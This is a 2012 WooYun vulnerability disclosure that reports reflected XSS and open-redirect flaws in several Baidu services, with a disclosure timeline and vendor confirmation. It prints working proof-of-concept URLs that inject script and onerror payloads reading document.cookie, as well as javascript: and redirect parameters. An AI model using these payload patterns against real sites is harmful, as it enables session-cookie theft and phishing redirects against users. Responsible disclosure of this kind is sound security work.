当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015237

漏洞标题:百度反射xss/url跳转小礼包

相关厂商:百度

漏洞作者: 水滴

提交时间:2012-11-25 17:55

修复时间:2013-01-09 17:56

公开时间:2013-01-09 17:56

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-25: 细节已通知厂商并且等待厂商处理中
2012-11-26: 厂商已经确认,细节仅向厂商公开
2012-12-06: 细节向核心白帽子及相关领域专家公开
2012-12-16: 细节向普通白帽子公开
2012-12-26: 细节向实习白帽子公开
2013-01-09: 细节向公众公开

简要描述:

百度反射xss/url跳转小礼包

详细说明:

反射型xss 和 url跳转

漏洞证明:

一键分享页面:
http://s.share.baidu.com/mshare?click=1&url=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2F&uid=&to=mshare&type=text&relateUid=&pic=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2Fimg%2Fsingle%2Fthinkgiving_db4f20b.jpg%3f%27%22%3e%3chr%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e&title=%25e7%2599%25be%25e5%25ba%25a6%25e5%2588%2586%25e4%25ba%25ab&key=&sign=on&desc=&comment=&searchPic=0


收藏到百度相册:
http://up.xiangce.baidu.com/opencom/picture/fav/add?app_id=314406&url=http://imgsrc.baidu.com/forum/pic/item/46f1f736afc37931f05971b3ebc4b74543a9117c.jpg&descript=求大图&tags=百度贴吧,桌面吧&source_url=http://tieba.baidu.com/p/1803552143&callback_url=javascript:alert(document.cookie)//&charset=gbk


通讯录:
http://tongxunlu.baidu.com/rest/2.0/pim/contacts?method=add&app_id=20&param={"list":[{"dn":"aaaa<hr><img src=x onerror=alert(document.cookie)>","luid":1,"lctime":1347955820586,"lmtime":1347955820586}]}


百度钱包:
https://wallet.baidu.com/order/?status=all&stime="><img src=x onerror=alert(document.domain)>&etime="><img src=x onerror=alert(document.cookie)>&type=q_om


注册成功的提示页面:
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=http://www.wooyun.org&errno=0
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=javascript:alert(document.cookie)&errno=0
需要等待三秒才会执行..... 在别的网站里加上iframe调用比较合适


百度分享查看数据分析页面:
http://share.baidu.com/analysis/urlshare?url=http://www.baidu.com/?%27%22%3E%3Chr%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


绑定帐号:
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=http://www.wooyun.org
如果已经登录了相应平台的帐号,授权后最终会跳转到可控的返回链接
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=javascript:alert(/test/)


贴图神器xss IE6 only :
http://tieba.baidu.com/photo/shenqi?title=&src=&pic[0]=javascript:alert(/ie6/)


绿钩302跳转:
http://m.baidu.com/share?action=preauth&arturl=http://www.qq.com


修复方案:

...

版权声明:转载请注明来源 水滴@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-11-26 16:16

厂商回复:

感谢对百度安全的关注,我们马上安排处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-11-26 12:17 | 陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)

    水滴牛又调戏度娘了~~~

  2. 2012-12-13 13:11 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    水滴 是你加我QQ吗? 前段时间有个叫水滴的人加我